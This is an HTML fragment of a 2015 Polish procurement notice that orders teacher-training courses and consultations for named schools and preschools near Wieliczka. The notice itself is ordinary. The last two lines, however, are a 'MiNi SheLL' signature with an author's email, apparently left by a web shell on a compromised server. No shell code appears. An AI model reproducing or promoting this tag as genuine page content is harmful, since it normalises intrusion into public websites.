Konsultacje: wdrażanie wiedzy i umiejętności ze szkolenia; konkretne wskazówki do pracy
Preferowane metody: warsztat - metody aktywne,  mini wykład, symulacja
Sugerowany termin realizacji usługi: marzec-kwiecień 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. bibliografia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Ocenianie w nowoczesnej szkole - szkolenie dodatkowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki:  Szkoła Podstawowa im. Tadeusza Kościuszki w
Przebieczanach.
Wymagane elementy szkolenia:  Formalno-prawne podstawy oceniania, klasyfikowania i promowania uczniów. Psychologiczne i pedagogiczne aspekty oceniania. Funkcje oceny szkolnej. Zasady oceniania uczniów, dylematy nauczyciela, najczęściej popełniane błędy, wskazówki jak ich uniknąć.  Obowiązki nauczyciela w procesie oceniania bieżącego i rocznego. Wymagania programowe a wymagania edukacyjne. Formułowanie wymagań edukacyjnych na poszczególne stopnie szkolne. Cele nauczania, zasady operacjonalizacji, taksonomia celów według Niemierki, Blooma, innych autorów. Ocenianie kształtujące a sumujące. Ocena opisowa. Budowanie wewnątrzszkolnego systemu oceniania - związek pomiędzy Wewnątrzszkolnymi Zasadami Oceniania i Przedmiotowym Systemem Oceniania. Dostosowanie wymagań edukacyjnych - dla uczniów o specjalnych potrzebach edukacyjnych oraz w kontekście obniżenia wieku szkolnego. 
Konsultacje grupowe:  
Warsztaty dla nauczycieli w zakresie rozwijającym i uzupełniającym treści ze szkolenia.
Sugerowany termin realizacji usługi: marzec-maj 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. bibliografia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Praca z klasą o niskiej motywacji - dodatkowe szkolenie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Gimnazjum im. Króla Władysława Jagiełły 
w Niepołomicach. 
Wymagane elementy szkolenia: aktualne wyniki badań nad motywacją; rozwijanie wewnętrznej motywacji i rozwijanie ciekawości poznawczej oraz podejmowanie wyzwań związanych z orientacją na osobiste cele ucznia; motywowanie ucznia w zależności od etapu rozwojowego, nauka jako pro-ces emocjonalny; rozwijanie odpowiedzialności uczniów za własny sukces edukacyjny; metody wzbudzania ciekawości poznawczej u uczniów; rozwijanie samodzielności i wytrwałości uczniów w obszarze zdobywania wiedzy i rozwią-zywaniu problemów; metody i techniki rozbudzające motywację - do zastosowania na każdym przedmiocie oraz dostosowane do specyfiki przedmiotów nauczanych przez uczestników; sposoby prowadzenia motywującej rozmowy z uczniem z problemami, niechętnym do nauki, oporującym, przykłady dobrych praktyk. Preferowana forma warsztatowa.
Konsultacje grupowe:
Warsztaty dla nauczycieli w zakresie rozwijającym i uzupełniającym treści ze szkolenia.
Sugerowany termin realizacji usługi: marzec-kwiecień.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. bibliografia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Kompetencje nauczyciela na I i II etapie edukacyjnym w kontekście obniżenia wieku szkolnego - dodatkowe szkolenie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki:  Szkoła Podstawowa  nr 4 im.  E.J Jerzmanowskiego w Wieliczce.
Wymagane elementy szkolenia: Szkolenie dla Rady Pedagogicznej:.
Zagadnienia do poruszenia podczas szkolenia:  Dostarczenie praktycznej, konkretnej wiedzy dotyczącej normy rozwojowej i zaburzeń u dziecka (w wieku 6-13 lat) - psychologia rozwojowa, etapy rozwojowe. Progi edukacyjne. Diagnozowanie potrzeb i możliwości uczniów, dostosowanie wymagań edukacyjnych do potrzeb i możliwości każdego ucznia, indywidualizacja i wielopoziomowość  nauczania. Planowanie realizacji podstawy programowej jako odpowiedź na zróżnicowane potrzeby i możliwości uczniów. Teoria inteligencji wielorakich Howarda Gardnera. Rozpoznawanie stylów uczenia się. Metody i formy pracy uwzględniające tempo pracy i możliwości percepcyjne dzieci w różnym wieku. 
Konsultacje grupowe:  
Warsztaty dla nauczycieli w zakresie rozwijającym i uzupełniającym treści ze szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. bibliografia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Monitorowanie przez nauczycieli realizacji podstawy programowej - dodatkowe szkolenie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Nazwa placówki: Szkoła Podstawowa nr 3 im. W. Puchalskiego w Niepołomicach Wymagane elementy szkolenia: sposoby monitorowania realizacji podstawy programowej przez nauczycieli różnych przedmiotów. Prezentacja metod, za pomocą których w ciągu roku szkolnego nauczyciel może systematycznie sprawdzać czy założenia podstawy programowej są realizowane. Sposoby prowadzenia jakościowej analizy stopnia realizacji podstawy programowej i postępów poszczególnych uczniów. Analiza sposobów wykorzystywanych przez nauczycieli w pracy dydaktycznej, wzbogacenie zakresu metod. Konsultacje indywidualne/grupowe: w zakresie rozwinięcia i uzupełnienia treści szkolenia, ze szczególnym uwzględnieniem następującej tematyki: wypracowanie baterii metod pomocnych w monitorowaniu podstawy programowej dla nauczycieli różnych przedmiotów; analiza i modyfikacja indywidualnych metod wykorzystywanych przez nauczycieli. Preferowane metody ustalone z Radą Pedagogiczną: wykład, symulacja, ćwiczenia praktyczne, warsztaty. Sugerowany termin realizacji usługi: marzec/kwiecień 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. bibliografia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Skuteczne techniki motywowania i aktywizowania uczniów do nauki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła Podstawowa Zespołu Szkół Ogólnokształcących w Szarowie. Wymagane elementy szkolenia: prezentacja metod aktywizujących, technik uczenia, gier i zabaw dydaktycznych pomocnych w aktywizowaniu do nauki uczniów na różnym poziomie edukacji, szczególnie szkoły podstawowej i gimnazjum. Sposoby dostosowywania wymagań w stosunku do uczniów o zróżnicowanym poziomie zdolności i umiejętności. Sposoby poprawiające koncentrację uwagi uczniów w czasie lekcji. Metody pracy z uczniem wykazującym cechy nadpobudliwości. Sposoby komunikowania się z uczniem i wspierania go w kształtowaniu pozytywnej samooceny. Praktyczne wykorzystywanie wybranych metod i technik aktywizujących w twórczym rozwiązywaniu problemów. Konsultacje indywidualne/grupowe w zakresie rozwinięcia i uzupełnienia treści ze szkolenia ze szczególnym uwzględnieniem następującej tematyki: przykłady dobrych praktyk; radzenie sobie z trudnościami na przykładzie konkretnych sytuacji zgłaszanych przez nauczycieli. Preferowane metody ustalone z Radą Pedagogiczną: wykład; prezentacje; analiza przypadków; metody aktywne - warsztaty. Sugerowany termin realizacji usługi: marzec/kwiecień 2015.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. bibliografia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Od badania potrzeb do koncepcji pracy szkoły.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Gimnazjum Zespołu Szkół Ogólnokształcących w Szarowie. Wymagane elementy szkolenia: koncepcja pracy szkoły, diagnozowanie potrzeb oraz tworzenie odpowiadającej na nie koncepcji pracy szkoły, wspólne wypracowywanie koncepcji pracy szkoły i/lub określenie pożądanych kierunków rozwoju przez całą społeczność szkolną, uspołecznienie opracowanej koncepcji, jej wdrożenie i ewaluacja. Konsultacje indywidualne/grupowe: opracowanie i wdrożenie narzędzi oraz procedur służących wspólnemu wypracowywaniu koncepcji pracy szkoły i/lub określeniu pożądanych kierunków rozwoju przez całą społeczność szkolną, z uwzględnieniem metody Profil Szkoły, wypracowanie przez nauczycieli procedury okresowego analizowania (dokonywania ewaluacji) i modyfikowania koncepcji pracy, wypracowanie/dobór sposobów informowania społeczności szkolnej o koncepcji pracy i wprowadzanych zmianach, stworzenie podstaw dla spójnego działania osób i organów odpowiedzialnych za realizację koncepcji pracy szkoły, promowanie kultury dialogu przydatnej w realizacji koncepcji. Preferowane metody ustalone z Radą Pedagogiczną: wykład; prezentacje; metody aktywne - warsztaty. Sugerowany termin realizacji usługi: marzec/kwiecień 2015.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. bibliografia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Wspieranie rozwoju ruchowego dziecka w wieku przedszkolnym - dodatkowe szkolenie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki:  Nazwa placówki: Przedszkole nr 5 im. Brata Alojzego Kosiby w Wieliczce. Wymagane elementy szkolenia: jak przebiega rozwój ruchowy dziecka od urodzenia do 6 roku życia, jakie umiejętności powinno posiadać dziecko, które kończy przedszkole, jak pracować na rozwojem ruchowym dziecka w wieku przedszkolnym (metody i techniki pracy, przykłady scenariuszy zajęć oraz dobrych praktyk. Konsultacje grupowe i indywidualne - w zakresie tematyki szkolenia. Preferowane metody ustalone z Radą Pedagogiczną: mini-wykład, symulacje, ćwiczenia praktyczne, warsztaty. Sugerowany termin realizacji usługi: luty 2015 (szkolenie), marzec/kwiecień 2015 (konsultacje).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. bibliografia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Szkolenie Narzędzia przydatne w kształtowaniu pozytywnych postaw uczniowskich. Konsultacje Narzędzia przydatne w kształtowaniu pozytywnych postaw uczniowskich - wdrażanie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Gimnazjum im. Ks. J. Twardowskiego w Zabierzowie Bocheńskim. Wymagane elementy szkolenia: przedstawienie praktycznych narzędzi służących kształtowaniu postaw uczniowskich (zwłaszcza w zakresie postaw prospołecznych). Proces uwewnętrzniania postaw - w jaki sposób wywoływać głębokie zmiany w uczniach. Narzędzia do współpracy z rodzicami, wspierające proces budowania postaw uczniowskich. Wskazania do budowy przestrzeni dialogu, umożliwiającego nauczycielom aktywizację rodziców do współpracy w zakresie kształtowania postaw prospołecznych Konsultacje grupowe: wsparcie nauczycieli we wdrażaniu konkretnych narzędzi kształtujących postawy prospołeczne u uczniów - udzielanie praktycznych wskazań do pracy z klasą. Preferowane metody ustalone z Radą Pedagogiczną: mini-wykład, warsztat, case-study, praktyczne ćwiczenia proponowanych metod. Sugerowany termin realizacji usługi: marzec/kwiecień 2015.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. bibliografia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Ocenianie kształtujące - podstawy - szkolenie dodatkowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Zespół Szkół Ogólnokształcących im. Ks. Jana Twardowskiego  w Kłaju - Gimnazjum.
Wymagane elementy szkolenia: czym jest ocenianie kształtujące - ogólne informacje, elementy oceniania kształtującego; różnice w ocenianiu tradycyjnym i kształtującym (wady/zalety); metody świateł, patyczków,; nauka formułowania celu, informacji zwrotnej; kryteria sukcesu; podsumowanie realizacji celów.
Konsultacje: warsztaty praktycznych umiejętności Preferowane metody: warsztat - metody aktywne,  mini wykład, symulacja.
Sugerowany termin realizacji usługi: marzec/kwiecień 2015 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. bibliografia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Ocenianie kształtujące - podstaw.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła Podstawowa  nr 2 im. T. Kościuszki  w Wieliczce z filią  w Sułkowie
Wymagane elementy szkolenia: różnice w ocenianiu tradycyjnym i kształtującym (wady/zalety); metody świateł, patyczków; nauka formułowania celu, informacji zwrotnej; kryteria sukcesu; podsumowanie realizacji celów.
Konsultacje: warsztaty  dla nauczycieli klas szkoły podstawowej z rozdzieleniem poziomu 1-3 oraz 4-6, w celu wypracowania konspektów dla edukacji wczesnoszkolnej  i  przedmiotów wiodących w klasach 4-6w ramach pracy w obszarze oceniania kształtującego.
Preferowane metody: warsztat - metody aktywne, mini wykład, symulacja
Sugerowany termin realizacji usługi: marzec - kwiecień  2015 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. bibliografia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Jak sobie poradzić ze stresem w szkole? - szkolenie dodatkowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Gimnazjum w Węgrzcach Wielkich. Wymagane elementy szkolenia: poznanie sposobów radzenia sobie ze stresem, pomoc nauczycielom w rozpoznawaniu i rozładowywaniu silnych emocju w sytuacjach stresowych m.in. metodą M-BB (szkoła, rozmowy z rodzicami). Pogłębienie znajomości mechanizmów fizjologicznych odpowiedzialnych za stres. Sposoby na osiągnięcie relaksu umysłowego i fizycznego. Warsztaty grupowe: przepracowanie w formie warsztatowej poznanych metod walki i profilaktyki ze stresem. Preferowane metody ustalone z Radą Pedagogiczną: mini-wykład, warsztaty, metody aktywne, ćwiczenia praktyczne, praca w grupie. Sugerowany termin realizacji usługi:marzec/kwiecień 2015.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. bibliografia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Jak reagować na prowokacyjne zachowania uczniów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Gimnazjum w Dobranowicach. 
Wymagane elementy szkolenia: procedury szybkiego reagowania na zachowania trudne; metody pracy, postępowania z uczniem trudnym; agresja pomiędzy uczniami i w stosunku do nauczyciela, jak reagować przeciwdziałać; zachowania buntownicze i prowokacyjne; problemy z nieobecnością uczniów - jak przeciwdziałać; praktyczne rozwiązania. 
Konsultacje: wdrażanie wiedzy i umiejętności ze szkolenia 
Preferowane metody: wykład z elementami dyskusji; studium przypadku.
Sugerowany termin realizacji usługi: marzec-kwiecień 2015 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. bibliografia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Diagnoza dziecka małego. Jak pracować z dzieckiem trudnym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Przedszkole nr 4  w Wieliczce
Wymagane elementy szkolenia: Diagnoza - normy i patologie; praca z dzieckiem trudnym, ze specyficznymi trudnościami; konkretne przykłady pracy; tworzenie planów działań wspierających i pracy z dzieckiem; czynniki na jakie warto zwrócić uwagę - zagrożenia; jak budować informację do przekazania rodzicowi.
Konsultacje: wdrażanie wiedzy i umiejętności ze szkolenia 
Sugerowany termin realizacji usługi: marzec/kwiecień 2015 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. bibliografia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Nowe metody aktywizujące w pracy w przedszkolu ze zwróceniem szczególnej uwagi na taniec przy piosence.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Przedszkole Sióstr Urszulanek w Sierczy. 
Wymagane elementy szkolenia: nowe metody pracy z dzieckiem przedszkolnym; układy taneczne przygotowane do konkretniej melodii; pląsy ze śpiewem; zabawy ruchowe; gotowe materiały do wykorzystania w pracy; pomocne, przykładowe scenariusze.
Konsultacje: wdrażanie wiedzy i umiejętności ze szkolenia 
Preferowane metody: warsztaty pozwalające na naukę poznanych metod. Sugerowany termin realizacji usługi: marzec/kwiecień 2015 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. bibliografia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Wspieranie rozwoju ruchowego dziecka w wieku przedszkolnym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Przedszkole w Biskupicach. Wymagane elementy szkolenia: jak przebiega rozwój ruchowy dziecka w wieku przedszkolnym; jakie umiejętności powinno posiadać dziecko, które kończy edukację przedszkolną; jak pracować nad rozwojem ruchowym dziecka w wieku  przedszkolnym (metody i techniki pracy, przykłady scenariuszy zajęć oraz dobrych praktyk).
Konsultacje grupowe  i indywidualne - warsztaty:  w zakresie tematyki szkolenia.
Preferowane metody ustalone z Radą Pedagogiczną: mini wykład, warsztaty, metody aktywne, ćwiczenia praktyczne, praca w grupie. Preferowane metody ustalone z Radą Pedagogiczną: mini-wykład, warsztaty, metody aktywne, ćwiczenia praktyczne, praca w grupie. Sugerowany termin realizacji usługi: marzec - kwiecień 2015.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. bibliografia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Ciekawe metody twórcze w pracy z dziećmi 3 - 4 letnimi w przedszkolu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Przedszkole w Biskupicach. Wymagane elementy szkolenia: przegląd nowych, ciekawych metod pracy grupowej z najmłodszymi przedszkolakami, aktywność plastyczna najmłodszych - techniki, aktywność ruchowa: metody pracy z grupą - metoda Klanzy (w tym zabawy z chustą animacyjną), metody gimnastyki twórczej - R. Labana, metoda A. i M. Kniessów itp. Konsultacje z ekspertem: zajęcia warsztatowe, ruchowe , praktyczne zastosowanie poznanych metod pracy z grupą dzieci najmłodszych w przedszkolu. Preferowane metody ustalone z Radą Pedagogiczną: mini-wykład, warsztaty, metody aktywne, ćwiczenia praktyczne, praca w grupie. Sugerowany termin realizacji usługi: marzec/kwiecień 2015.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. bibliografia - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com